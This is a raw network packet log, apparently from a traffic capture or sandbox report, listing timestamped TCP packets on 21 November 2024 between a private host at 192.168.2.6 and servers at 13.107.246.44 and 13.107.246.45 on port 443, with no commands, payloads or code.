                                                                                                                                                                                                            Nov 21, 2024 15:17:53.934340000 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.934355021 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.934365034 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.934370041 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.934906006 CET49848443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.934923887 CET4434984813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.935339928 CET49848443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.935344934 CET4434984813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.939060926 CET49852443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.939095020 CET4434985213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.939182043 CET49852443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.939399958 CET49852443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.939416885 CET4434985213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.985081911 CET4434984713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.986660957 CET49847443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.986690998 CET4434984713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.987421989 CET49847443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.987427950 CET4434984713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.094938040 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.094965935 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.095004082 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.095021009 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.095037937 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.095042944 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.095065117 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.095081091 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.095093012 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.095115900 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.097642899 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.098495960 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.098530054 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.099103928 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.099109888 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.151190996 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.151657104 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.151679993 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.152153969 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.152159929 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.171926975 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.171973944 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.171993017 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.172024965 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.172035933 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.172043085 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.172055006 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.172072887 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.172091007 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.172105074 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.172121048 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.278323889 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.278381109 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.278424978 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.278445005 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.278493881 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.281444073 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.324523926 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.324583054 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.324601889 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.324613094 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.324662924 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.370559931 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.370628119 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.370630026 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.370657921 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.370688915 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.370711088 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.375026941 CET4434984813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.378568888 CET4434984813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.378628969 CET49848443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.378699064 CET49848443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.378724098 CET4434984813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.378737926 CET49848443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.378746033 CET4434984813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.382354021 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.382389069 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.382594109 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.382807970 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.382821083 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.423337936 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.423405886 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.423424959 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.423439980 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.423453093 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.423482895 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.446655035 CET4434984713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.449631929 CET4434984713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.449690104 CET49847443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.449740887 CET49847443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.449753046 CET4434984713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.449764013 CET49847443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.449771881 CET4434984713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.452554941 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.452593088 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.452666998 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.452800989 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.452814102 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469014883 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469038963 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469119072 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469145060 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469161987 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469167948 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469188929 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469229937 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469244957 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469327927 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469361067 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.469387054 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.470823050 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.470840931 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.493427992 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.493453026 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.493500948 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.493513107 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.493551970 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.493592978 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.515100956 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.515125036 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.515228033 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.515228033 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.515239000 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.515332937 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.533780098 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.533797979 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.533895016 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.533905983 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.534060001 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.564769983 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.564843893 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.565099955 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.565099955 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.565171003 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.565186024 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.568294048 CET49855443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.568326950 CET4434985513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.568442106 CET49855443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.568608999 CET49855443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.568624973 CET4434985513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.606611013 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.609735012 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.609889984 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.609939098 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.609939098 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.609961987 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.609977961 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.612387896 CET49856443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.612426996 CET4434985613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.612513065 CET49856443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.621545076 CET49856443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.621576071 CET4434985613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.658281088 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.658307076 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.658369064 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.658400059 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.658433914 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.658476114 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.672888041 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.672904968 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.673001051 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.673002005 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.673029900 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.673108101 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.689501047 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.689522982 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.689591885 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.689604044 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.689769030 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.706381083 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.706402063 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.706460953 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.706485987 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.706501007 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.706901073 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.707709074 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.707753897 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.708076000 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.708496094 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.708517075 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.720638990 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.720706940 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.720803022 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.720803022 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:54.720817089 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:55.720113039 CET4434985213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:55.720594883 CET49852443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:55.720618963 CET4434985213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:55.721103907 CET49852443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:55.721108913 CET4434985213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.163125992 CET4434985213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.166279078 CET4434985213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.166385889 CET49852443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.166773081 CET49852443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.166790009 CET4434985213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.166816950 CET49852443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.166825056 CET4434985213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.168335915 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.168971062 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.168992043 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.169703007 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.169708014 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.170845985 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.170881033 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.170958996 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.171078920 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.171098948 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.256587982 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.257067919 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.257097006 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.257625103 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.257632017 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.355539083 CET4434985513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.355999947 CET49855443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.356019974 CET4434985513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.357007980 CET49855443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.357028008 CET4434985513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.474342108 CET4434985613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.474868059 CET49856443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.474894047 CET4434985613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.475342035 CET49856443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.475347996 CET4434985613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.620531082 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.623830080 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.623887062 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.624280930 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.624280930 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.624313116 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.624324083 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.631459951 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.631495953 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.631570101 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.631794930 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.631809950 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.667434931 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.667757988 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.667788982 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.668817043 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.668950081 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.669482946 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.669482946 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.669552088 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.699526072 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.702650070 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.702794075 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.705122948 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.705122948 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.705142021 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.705152988 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.714957952 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.714993954 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.715092897 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.715225935 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.715259075 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.718799114 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.718806028 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.767043114 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.798891068 CET4434985513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.798964024 CET4434985513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.799423933 CET49855443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.801111937 CET49855443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.801130056 CET4434985513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.804963112 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.804991007 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.805113077 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.805289984 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.805304050 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.927606106 CET4434985613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.930983067 CET4434985613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.931072950 CET49856443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.935585022 CET49856443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.935585022 CET49856443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.935601950 CET4434985613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.935611963 CET4434985613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.945137978 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.945168018 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.945267916 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.945502996 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:56.945516109 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.171578884 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.171608925 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.171619892 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.171633959 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.171642065 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.171648979 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.171689987 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.171722889 CET4434985713.107.246.45192.168.2.6
